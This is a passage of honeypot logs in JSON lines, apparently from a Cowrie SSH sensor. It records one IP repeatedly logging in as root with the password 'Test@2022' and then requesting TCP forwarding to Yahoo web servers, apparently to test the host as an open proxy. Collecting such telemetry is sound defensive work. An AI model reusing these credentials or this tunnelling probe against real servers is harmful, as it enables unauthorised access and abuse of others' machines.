p384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:56:55.086783Z","src_ip":"213.209.150.239","session":"7ef25521e062"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:56:55.368509Z","src_ip":"213.209.150.239","session":"7ef25521e062"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":11000,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:11000","sensor":"my-vps","timestamp":"2025-08-26T00:56:55.426152Z","session":"7ef25521e062"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:55.482944Z","src_ip":"213.209.150.239","session":"7ef25521e062"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":12476,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:12476","sensor":"my-vps","timestamp":"2025-08-26T00:56:55.639015Z","session":"7ef25521e062"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:55.695691Z","src_ip":"213.209.150.239","session":"7ef25521e062"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:55.754056Z","src_ip":"213.209.150.239","session":"7ef25521e062"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":58195,"dst_ip":"1.2.3.4","dst_port":22,"session":"a3ec2f1765f3","protocol":"ssh","message":"New connection: 213.209.150.239:58195 (1.2.3.4:22) [session: a3ec2f1765f3]","sensor":"my-vps","timestamp":"2025-08-26T00:56:55.809371Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:56:55.810263Z","src_ip":"213.209.150.239","session":"a3ec2f1765f3"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:56:55.866715Z","src_ip":"213.209.150.239","session":"a3ec2f1765f3"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:56:56.148898Z","src_ip":"213.209.150.239","session":"a3ec2f1765f3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":29098,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:29098","sensor":"my-vps","timestamp":"2025-08-26T00:56:56.207247Z","session":"a3ec2f1765f3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:56.263829Z","src_ip":"213.209.150.239","session":"a3ec2f1765f3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":25520,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:25520","sensor":"my-vps","timestamp":"2025-08-26T00:56:56.419057Z","session":"a3ec2f1765f3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:56.475869Z","src_ip":"213.209.150.239","session":"a3ec2f1765f3"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:56.533144Z","src_ip":"213.209.150.239","session":"a3ec2f1765f3"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":58248,"dst_ip":"1.2.3.4","dst_port":22,"session":"e57f0d9ea37a","protocol":"ssh","message":"New connection: 213.209.150.239:58248 (1.2.3.4:22) [session: e57f0d9ea37a]","sensor":"my-vps","timestamp":"2025-08-26T00:56:56.579270Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:56:56.579957Z","src_ip":"213.209.150.239","session":"e57f0d9ea37a"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:56:56.627486Z","src_ip":"213.209.150.239","session":"e57f0d9ea37a"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:56:56.862768Z","src_ip":"213.209.150.239","session":"e57f0d9ea37a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":13671,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:13671","sensor":"my-vps","timestamp":"2025-08-26T00:56:56.910572Z","session":"e57f0d9ea37a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:56.957836Z","src_ip":"213.209.150.239","session":"e57f0d9ea37a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":32013,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:32013","sensor":"my-vps","timestamp":"2025-08-26T00:56:57.093700Z","session":"e57f0d9ea37a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:57.141245Z","src_ip":"213.209.150.239","session":"e57f0d9ea37a"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:57.189302Z","src_ip":"213.209.150.239","session":"e57f0d9ea37a"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":58305,"dst_ip":"1.2.3.4","dst_port":22,"session":"6774923e624d","protocol":"ssh","message":"New connection: 213.209.150.239:58305 (1.2.3.4:22) [session: 6774923e624d]","sensor":"my-vps","timestamp":"2025-08-26T00:56:57.235491Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:56:57.236893Z","src_ip":"213.209.150.239","session":"6774923e624d"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:56:57.284103Z","src_ip":"213.209.150.239","session":"6774923e624d"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:56:57.518960Z","src_ip":"213.209.150.239","session":"6774923e624d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":11323,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:11323","sensor":"my-vps","timestamp":"2025-08-26T00:56:57.567210Z","session":"6774923e624d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:57.614816Z","src_ip":"213.209.150.239","session":"6774923e624d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":22122,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:22122","sensor":"my-vps","timestamp":"2025-08-26T00:56:57.750400Z","session":"6774923e624d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:57.798275Z","src_ip":"213.209.150.239","session":"6774923e624d"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:57.847569Z","src_ip":"213.209.150.239","session":"6774923e624d"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":58368,"dst_ip":"1.2.3.4","dst_port":22,"session":"586080f31d70","protocol":"ssh","message":"New connection: 213.209.150.239:58368 (1.2.3.4:22) [session: 586080f31d70]","sensor":"my-vps","timestamp":"2025-08-26T00:56:57.893726Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:56:57.902757Z","src_ip":"213.209.150.239","session":"586080f31d70"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:56:57.941041Z","src_ip":"213.209.150.239","session":"586080f31d70"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:56:58.176793Z","src_ip":"213.209.150.239","session":"586080f31d70"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":2177,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:2177","sensor":"my-vps","timestamp":"2025-08-26T00:56:58.224790Z","session":"586080f31d70"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:58.272020Z","src_ip":"213.209.150.239","session":"586080f31d70"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":8712,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:8712","sensor":"my-vps","timestamp":"2025-08-26T00:56:58.417621Z","session":"586080f31d70"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:58.464700Z","src_ip":"213.209.150.239","session":"586080f31d70"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:58.512482Z","src_ip":"213.209.150.239","session":"586080f31d70"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":58413,"dst_ip":"1.2.3.4","dst_port":22,"session":"2b1cda24271b","protocol":"ssh","message":"New connection: 213.209.150.239:58413 (1.2.3.4:22) [session: 2b1cda24271b]","sensor":"my-vps","timestamp":"2025-08-26T00:56:58.558655Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:56:58.559560Z","src_ip":"213.209.150.239","session":"2b1cda24271b"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:56:58.606432Z","src_ip":"213.209.150.239","session":"2b1cda24271b"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:56:58.841681Z","src_ip":"213.209.150.239","session":"2b1cda24271b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":25776,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:25776","sensor":"my-vps","timestamp":"2025-08-26T00:56:58.890430Z","session":"2b1cda24271b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:58.937718Z","src_ip":"213.209.150.239","session":"2b1cda24271b"}
